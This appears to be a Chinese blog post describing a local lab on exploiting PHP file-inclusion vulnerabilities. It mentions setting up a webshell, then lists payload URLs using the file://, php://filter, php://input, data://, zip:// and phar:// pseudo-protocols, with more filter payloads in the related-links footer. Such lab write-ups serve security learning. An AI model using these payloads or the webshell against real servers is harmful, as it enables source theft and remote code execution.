首页 > 编程语言 >文件包含PHP伪协议利用方法 本地复现

文件包含PHP伪协议利用方法 本地复现

时间:2024-09-03 19:55:50浏览次数:16  
标签:php less pro cmd 123 复现 本地 txt PHP

环境配置

步骤一:更改参数

php.ini ⾥有两个重要的参数 allow_url_fopen 、allow_url_include 步骤二:创建123.php文件输入一句话木马 步骤三:创建1.php

less-1 file://协议

123.php?cmd=file://D:\phpstudy_pro\WWW\1.php

less-2 php://filter协议

base解码

less-3 php://input协议

123.php?cmd=php://input利用burp抓包 更改传参方式 更改参数进行放包

less-4 data://

123.php?cmd=data:text/plain,<?php phpinfo();?>

less-5 zip://

创建2.txt文件进行压缩

123.php?cmd=zip://D:\phpstudy_pro\WWW\2.zip%232.txt

less-6 phar://

123.php?cmd=phar://D:\phpstudy_pro\WWW\2.zip\2.txt

标签:php,less,pro,cmd,123,复现,本地,txt,PHP
From: https://blog.csdn.net/2301_82061181/article/details/141868841

相关文章

  • 【SCI复现】基于纳什博弈和ADMM的多微网主体能源共享研究(Matlab代码实现)
    ......
  • 【太阳能学报EI复现】基于粒子群优化算法的风-水电联合优化运行分析(Matlab代码实现)
    ......
  • 文件包含PHP伪协议利用方法
    1.file://协议使⽤:file://⽂件的绝对路径和⽂件名2.php?cmd=file://D:\phpstudy_pro\WWW\123.txt2.php://filter协议⽤途:常⽤于读取⽂件/源码2.php?cmd=php://filter/read=convert.base64-encode/resource=1.php3.php://input协议步骤一:2.p......
  • php 把文件加入到现有的zip压缩包中
    //指定要添加的文件和已有的压缩包名称$fileToAdd=public_path().'pdffile/file1.txt';//要添加的文件$zipFileName=public_path().'pdfzip/archive.zip';//已有的压缩包名称//创建一个新的ZIP档案对象$zip=newZipArchive();......
  • php 创建压缩包zip,并将指定文件放入zip中
    目前用的是tp6框架//指定要压缩的文件和压缩包的名称$filesToZip=[public_path().'pdffile/生物样本库-原件.pdf'];//要压缩的文件列表$zipFileName=public_path().'pdfzip/archive.zip';//压缩包名称//创建一个新的ZIP档案$zip=......
  • 本地搭建 Whisper 语音识别模型实现实时语音识别研究
    目录摘要关键词1.引言2.Whisper模型简介3.环境准备4.系统架构与实现4.1模型加载4.2实时音频输入处理4.3实时转录处理4.4程序实现的框架4.5代码实现5.实验与结果6.讨论7.结论参考文献摘要语音识别技术近年来发展迅速,广泛应用于智能家居、智能客......
  • PHP性能优化
        PHP性能优化是指通过一系列的技术手段和优化策略来提升PHP程序的执行效率和响应速度,更好地满足用户的需求和提供更好的用户体验。下面列举了一些常见的PHP性能优化方法:一、使用合适的PHP版本        不同的版本在性能、功能和语法等方面都有所不同,开发人......
  • 解除本地Git仓库与远程仓库关联
     清除Git凭据缓存Git在本地会缓存你的认证信息,以便在后续操作中自动使用。你可以通过以下步骤来清除这些缓存的凭据:对于Windows用户:打开“控制面板”并选择“凭据管理器”(CredentialManager)。在“Windows凭据”下查找与GitHub相关的凭据(可能是以git:或github.com开头的......
  • 本地机spool导出多个查询结果到多个CSV文件
    问题需要在PL/SQLdeveloper上多次手动重复查询导出大量数据。解决使用sqlcl中提供的SETSQLFORMATcsv和SQLplus提供的Spool导出数据到csv文件。代码setserveroutputonsettermoutoffspoolD:\SpoolFile\tmp_script.sqlDECLARETYPETYPE_ARRAYISVARRAY(10)O......